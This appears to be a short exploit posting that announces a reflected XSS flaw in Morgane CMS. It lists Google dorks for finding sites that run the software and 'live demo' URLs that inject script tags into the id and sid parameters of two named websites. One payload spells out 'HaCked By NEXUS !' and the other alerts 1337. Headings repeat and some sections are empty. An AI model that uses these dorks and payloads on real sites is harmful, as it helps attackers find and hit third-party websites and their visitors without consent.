Morgane CMS - XSS Vulnerability
Dorks:
Use string to char.. Or use numbers..
Example & Live Demo:
String to char mode:
Numbers mode (testing mode):
intext:"www.morgane.co.uk" inurl:"/main.php?sid="
intext:"www.morgane.co.uk" inurl:"/main.php?id="
Use string to char.. Or use numbers..
Example & Live Demo:
String to char mode:
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E
Numbers mode (testing mode):
http://www.donkeyisland.org/main.php?id=505%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E
http://hospitality.wayout.net/en/main.php?sid=96%22%3E%3Cscript%3Ealert%281337%29;%3C/script%3E* Can run XSS only on Firefox not Google Chrome :D
NEXUS
